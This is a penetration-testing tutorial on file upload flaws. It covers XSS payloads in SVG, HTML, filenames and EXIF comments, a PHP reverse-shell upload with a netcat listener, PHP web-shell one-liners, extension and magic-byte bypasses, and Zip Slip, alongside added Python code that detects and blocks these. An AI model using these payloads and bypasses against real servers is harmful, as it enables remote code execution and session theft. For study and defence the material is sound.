AlbusSec:- Penetration-list 02 File Upload Vulnerability— Part-2
Hi again. Without wasting time, we will jump straight into today's topic. Overall, we will learn about Remote Code Execution and also Cross-Site Scripting via file upload. If you have not read our Part 1, please read that article first, because it covers the basics of file upload vulnerabilities and this article is the second part of it. First, let me introduce myself: I'm Aniket Tyagi, an Information Technology officer at the 5f eco foundation of India and the founder of Albus Security. In this part we will first learn Cross-Site Scripting through file upload, then Remote Code Execution, then the advanced bypass tricks and the ZipSlip attack. Let's get started in our sage mode.
→ Cross-Site-Scripting via a File Upload:-
I hope you already know about the Cross-Site Scripting vulnerability, so we will jump directly to XSS through file upload. File upload functionality gives us multiple ways to execute cross-site scripting: uploading malicious files such as an SVG or HTML file, changing the file name into an XSS payload like <img src=x onerror=alert()>.png, and adding an XSS payload into the "Metadata" of the file. We will learn each of these one by one.
Cross-Site-Scripting via uploading Malicious files:-
For SVG:-
<svg version="1.1" xmlns="http://www.w3.org/2000/svg">
<script>
prompt()
</script>
</svg>
For HTML:-
<script type="text/javascript">
alert(document.cookie)
</script>
For blind XSS through an SVG file:-
<svg
xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink">
<polygon id="triangle" points="50,0 50,50 50,0" fill="#009900" stroke="#004400"/>
<script xlink:href="https://burpsuite-Collaborator" />
<script>
prompt();
</script>
</svg>
For blind XSS through an HTML file:-
<h1>Blind-Xss-Through-File-Upload</h1>
<img src="http://Burpsuite-Collaborator"/>
<script>
alert()
</script>
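As an added defensive example (not code from the article), the following Python audits an uploaded SVG for the primitives the payloads above rely on: script elements, event-handler attributes, and href/src values that call out to a collaborator host or run javascript:. It can also strip them before the file is ever served inline. The hostile sample is constructed here after the blind-XSS SVG; burpsuite-Collaborator is the article's placeholder host.

```python
"""Audit and neutralise uploaded SVGs before they are served inline.
Added example, not code from the article; both sample SVGs below are
constructed, the hostile one modelled on the blind-XSS payload above."""
import xml.etree.ElementTree as ET  # use defusedxml.ElementTree for untrusted input

ACTIVE_TAGS = {"script", "foreignobject"}
EXTERNAL = ("http:", "https:", "//", "javascript:")

def _local(qname: str) -> str:  # drop the {namespace} prefix ElementTree adds
    return qname.rsplit("}", 1)[-1].lower()

def _bad_attr(name: str, value: str) -> bool:
    attr = _local(name)
    return attr.startswith("on") or (
        attr in ("href", "src") and value.strip().lower().startswith(EXTERNAL))

def audit_svg(data: bytes) -> list:
    """Every reason the file must not be served inline: script/foreignObject
    elements, on* handlers, and href/src values that call out or run javascript:."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"unparsable svg: {exc}"]  # unparsable is itself a finding
    findings = []
    for el in root.iter():
        tag = _local(el.tag)
        if tag in ACTIVE_TAGS:
            findings.append(f"<{tag}> element")
        findings += [f"{_local(n)}={v!r} on <{tag}>"
                     for n, v in el.attrib.items() if _bad_attr(n, v)]
    return findings

def strip_active_content(data: bytes) -> bytes:
    """Remove offending elements and attributes; re-audit before serving."""
    root = ET.fromstring(data)
    parent = {child: p for p in root.iter() for child in p}
    for el in list(root.iter()):
        if el is not root and _local(el.tag) in ACTIVE_TAGS:
            parent[el].remove(el)
            continue
        for name in [n for n, v in el.attrib.items() if _bad_attr(n, v)]:
            del el.attrib[name]
    return ET.tostring(root)

# Constructed samples; the first mirrors the article's blind-XSS SVG.
BLIND_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <polygon id="triangle" points="50,0 50,50 50,0" fill="#009900"/>
  <script xlink:href="https://burpsuite-Collaborator"/><script>prompt();</script>
</svg>"""
BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><circle r="5"/></svg>'
```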
→ Changing file name to Xss payload:-
Now, the second way to test for XSS via a file upload is to change the filename into a Cross-Site Scripting payload. For example, the attacker first tries to upload HTML or SVG files to execute XSS, but the server validates the file type on its upload functionality. So the attacker changes the filename into an XSS payload like <img src=x onerror=alert()>.png; if the application later reflects that filename into a page without encoding it, the attacker has successfully executed XSS via a file upload.
Content-Disposition: form-data; name="avatar"; filename="<img src=x onerror=alert()>.png"
Content-Type: image/png
→ Cross-Site-Scripting through metadata:-
Metadata is information stored inside a file that describes the file itself, such as its size, author, creation date and modification date. But how do we execute Cross-Site Scripting through it? We put our XSS payload into the image metadata. To view and change the metadata and add our payload to it, we will use ExifTool. First, view the metadata of the file with this command:-
./exiftool {FILE-NAME}
This command prints the metadata of the given file. Now we add a Comment tag and put our Cross-Site Scripting payload into it with this command:-
./exiftool -comment="<script>prompt()</script>" {FILE-NAME}
That is all about Cross-Site Scripting via uploading malicious files.
Penetration-List:- https://github.com/AlbusSec/Penetration-List/tree/main/File-Upload%20-02/Xss%20via%20file%20upload
→ Remote Code Execution:-
Whenever attackers or testers see file upload functionality, the first thought that comes to mind is to upload a shell and execute malicious commands on the server, i.e. Remote Code Execution. We have several ways to execute code on a server through file upload; the easiest is to upload a shell and use it to gain further access. We will also learn other methods.
First, we will learn how to get shell access through an uploaded shell. For this I will use a PHP reverse shell; you can also use another shell depending on your requirements.
PHP-Reverse-shell:- https://github.com/pentestmonkey/php-reverse-shell
Before uploading this shell, you need to configure it: replace {Your-tun0-IP} and {Port} in the script with your own listener address and port.
If you see an error saying that the server doesn't support the PHP extension, use bypass tricks such as: php → php5, php3, inc → png.php, png.php5, png.inc → pdf.svg.php, geo.csv.php5, jpg.png.inc, etc. After successfully uploading the shell, the first thing is to find the path or directory of the uploaded shell, for example → https://AlbusSecurity.com/upload/files/shell.php If the shell is reachable there, start your listener on your own system before triggering it; most bug hunters use a Netcat listener for this. In php-reverse-shell I configured port 443, so the command to start the listener is { nc -lvnp 443 }. Then open the script that was uploaded on the server. If your shell works properly, you get a reverse shell.
Remote Code Execution Through Metadata:-
I have already explained metadata. Now we will learn how to execute commands on the server just by changing the metadata to contain PHP code. I will put the PHP code in a metadata field such as Comment or DocumentName; for this you can use ExifTool. Note the single quotes around the tag value, so that the shell does not expand $_GET:-
./exiftool -comment='<?php system($_GET["cmd"]);?>' {FILE-NAME}
After uploading the file, find the upload directory, for example → https://AlbusSecurity.com/files/shell.php If the shell is accessible, try to execute commands against it like this: → https://AlbusSecurity.com/files/shell.php?cmd=whoami
→ ZipSlip Attack:-
ZipSlip is an interesting attack vector that can be tested when the application allows an attacker to upload archives through its file upload functionality and later unarchives them for further processing; it can also result in remote command execution. This type of vulnerability has existed for a long time, but recently it has manifested itself in a much larger number of projects and libraries. Beginners have a low chance of finding this vulnerability, but you can still try. When you see that your target uses JavaScript, Ruby, .NET or Go, that is a plus point for us.
Some small steps to check for this vulnerability:-
- Get your malicious zip:- https://github.com/snyk/zip-slip-vulnerability/tree/master/archives
- Upload the malicious file to the archive upload functionality.
If you want to learn more about this vulnerability, check this:- https://snyk.io/research/zip-slip-vulnerability
Note: After completing our Penetration-List project, I will make some new malicious zip files.
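An added example of the server-side fix, not code from the article or from Snyk's test archives: Python that refuses an uploaded archive outright if any member would extract outside the destination directory. Two archives are constructed in memory to exercise it, one benign and one carrying a '../' chain and an absolute path in the style of the public Zip Slip samples.

```python
"""Zip Slip defence for an archive-upload endpoint: refuse any member whose
resolved path lands outside the destination directory.  Added example, not the
article's code; the sample archives are constructed in memory below."""
import io
import os
import zipfile

def unsafe_members(zf: zipfile.ZipFile, dest: str) -> list:
    """Names that would escape `dest`: '../' chains, absolute paths and
    Windows-style separators, the patterns the public Zip Slip test archives use."""
    dest_real = os.path.realpath(dest)
    bad = []
    for info in zf.infolist():
        name = info.filename.replace("\\", "/")      # backslash is a separator too
        target = os.path.realpath(os.path.join(dest_real, name))
        if name.startswith("/") or os.path.commonpath([dest_real, target]) != dest_real:
            bad.append(info.filename)
    return bad

def unsafe_members_in(zip_bytes: bytes, dest: str) -> list:
    """Same check on raw upload bytes, without touching the filesystem."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return unsafe_members(zf, dest)

def extract_safely(zip_bytes: bytes, dest: str) -> list:
    """All-or-nothing extraction.  Python's own extractall() strips '../'
    silently; refusing the whole archive instead surfaces the attack in
    your logs rather than hiding it.  Returns the extracted member names."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        bad = unsafe_members(zf, dest)
        if bad:
            raise ValueError(f"zip slip attempt, members: {bad}")
        zf.extractall(dest)
        return zf.namelist()

def build_sample(evil: bool) -> bytes:
    """Constructed archive: one benign file, plus two escaping entries when
    evil=True (a '../' chain like the Snyk evil.txt samples, and an absolute path)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("docs/readme.txt", "benign\n")
        if evil:
            zf.writestr("../../../../tmp/evil.txt", "owned\n")
            zf.writestr("/etc/cron.d/evil", "owned\n")
    return buf.getvalue()
```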
→ Advanced Bypass Tricks:-
In this section, we will learn more tricks to bypass the protections against the File Upload vulnerability.
→ Malicious Gif:-
GIF stands for Graphics Interchange Format; I hope you already know about the GIF file format. Now, how do we use it to bypass a file restriction? Simply add GIF8; to the beginning of the file content, like this:
GIF8; <?php echo shell_exec($_GET['cmd']); ?>
You can also use Burp Suite for this:-
Step 1:- Upload the file and intercept the request, then add GIF8; at the beginning of the file content to make it look like a .gif file.
Step 2:- If you get an error, use a double extension like php.gif.
→ Magic Header Bytes:-
It is possible to make a malicious file look like a legitimate file. Yes, but how? By changing the magic numbers. Basically, magic numbers are the first bytes of a file that uniquely identify its type. To identify a particular file format you only need to look at the first few bytes of the file; that is why the magic number is also called the magic bytes. Now your mind puts up a question: how do we check for magic bytes, and how do we bypass a file restriction with their help? Magic numbers (file signatures) are normally not visible, but you can see them with a hex editor or by reading the file with the 'xxd' command.
→ A hex editor (or binary file editor or byte editor) is a computer program that allows for manipulation of the fundamental binary data that constitutes a computer file.
How We See Magic Numbers:-
Step 1:- Install the hexedit tool on your machine by entering this command in your terminal:-
sudo apt-get install hexedit
Step 2:- Take one JPG file and enter this command:
xxd {JPG-FILE-NAME} | head
This command shows the first bytes of the file, i.e. its magic bytes. You can see that the file starts with FFD8 FFE0 0010 4A46, which means it is a JPG. To check what type of file this is, enter this command:-
file {JPG-FILE-NAME}
So that is how we see the magic number of a file. If you want to check more signatures/magic bytes of a particular file type, please check this:- https://en.wikipedia.org/wiki/List_of_file_signatures
But how do we bypass the file restriction? Let's take an example: I try to upload php-reverse-shell, but I can't, because the server uses some advanced mechanism to protect itself. I need to bypass it, so I will use the magic header bytes trick. To put it simply, if I change the PHP file's magic bytes into JPG magic bytes, the PHP file is treated like a JPG file. That is how a malicious file is made to look like a legitimate file.
Follow these steps:-
Step 1:- xxd php-reverse-shell.php | head :- to check the PHP file's magic bytes
You can see that the PHP file's magic number is different from the JPG file's; other file types also have their own different magic numbers.
Step 2:- It's time to change the magic number; run this command:-
hexedit php-reverse-shell.php
Then I change the first bytes into FFD8 FFDB {these magic bytes are used in JPG}, save it and press Ctrl+X to exit.
Step 3:- To verify that you successfully changed the PHP magic bytes into JPG, enter this command:-
file php-reverse-shell.php
You see that it indicates your file type is JPG. It's done: upload this file and the server doesn't block you, because it assumes you uploaded a JPG file. The server only checks the magic number of the file; no other protection was implemented. So that's how the magic header bytes bypass trick works.
If you can't understand how to make a malicious file with a forged magic number, don't worry. I uploaded some php-reverse-shell files with different file signatures/magic bytes in my Penetration-List: https://github.com/AlbusSec/Penetration-List/tree/main/File-Upload%20-02/Malicious-Magic-Header-bytes-files
Congratulations, we have covered lots of the topics that come up in File upload vulnerabilities. But wait for the third article, because it contains more things like SQL injection, Server-Side Request Forgery (SSRF) via uploading files, etc. Thank you for reading.
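An added example (not the article's code) of the checks a server needs so that the bypass list from the RCE section (php5, png.php5, pdf.svg.php), the php.gif double extension, the GIF8; prefix, the spoofed FFD8 FFDB header and the ExifTool comment payload are all rejected: exactly one extension drawn from an allowlist, the declared type's genuine signature, and a scan of the whole body for server-side script markers. Every sample file is constructed inline.

```python
"""Upload gate for an image endpoint that defeats the bypasses in this article:
multi-extension names (png.php5, pdf.svg.php, php.gif), the 'GIF8;' prefix,
spoofed JPEG magic bytes and PHP planted in an EXIF comment.  Added example,
not the article's code; every sample file below is constructed."""
import re

# Genuine signatures only: 'GIF8;' is not one, so it fails the gif check.
MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# Long markers only: 2-3 byte strings such as b"<%" or b"<?=" would match random
# pixel data in almost every real photo and cause false positives.
SCRIPT_MARKERS = (b"<?php", b"<script")
BASENAME = re.compile(r"[a-z0-9_-]{1,64}")

def check_upload(filename: str, data: bytes) -> str:
    """Return 'ok' or a 'reject: ...' reason.  The name is checked first, so a
    payload-bearing filename is never even stored or sniffed."""
    parts = filename.lower().split(".")
    if len(parts) != 2 or not BASENAME.fullmatch(parts[0]):
        return "reject: name must be <basename>.<ext> with exactly one extension"
    ext = parts[1]
    if ext not in MAGIC:
        return f"reject: extension .{ext} not allowed"
    if not data.startswith(MAGIC[ext]):
        return f"reject: body does not start with a {ext} signature"
    if any(marker in data.lower() for marker in SCRIPT_MARKERS):
        return "reject: server-side script marker inside body"
    return "ok"

# Constructed samples mirroring the article's payloads (JFIF header, then for
# exif_comment a COM segment, marker FF FE, carrying the PHP one-liner).
JFIF = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01"
SAMPLES = {
    "gif8_trick": ("cat.gif", b"GIF8; <?php echo shell_exec($_GET['cmd']); ?>"),
    "spoofed_jpg": ("shell.jpg", b"\xff\xd8\xff\xdb<?php system($_GET['cmd']); ?>"),
    "exif_comment": ("photo.jpg", JFIF + b"\xff\xfe\x00\x20<?php system($_GET['cmd']);?>"),
    "benign_jpg": ("photo.jpg", JFIF + bytes(32)),
}

def run_samples() -> dict:
    """Verdict for every constructed sample, keyed by its name."""
    return {k: check_upload(name, body) for k, (name, body) in SAMPLES.items()}
```

Re-encoding the image through an image library, which also drops the EXIF data, is the stronger control; this gate is the cheap check that belongs in front of it.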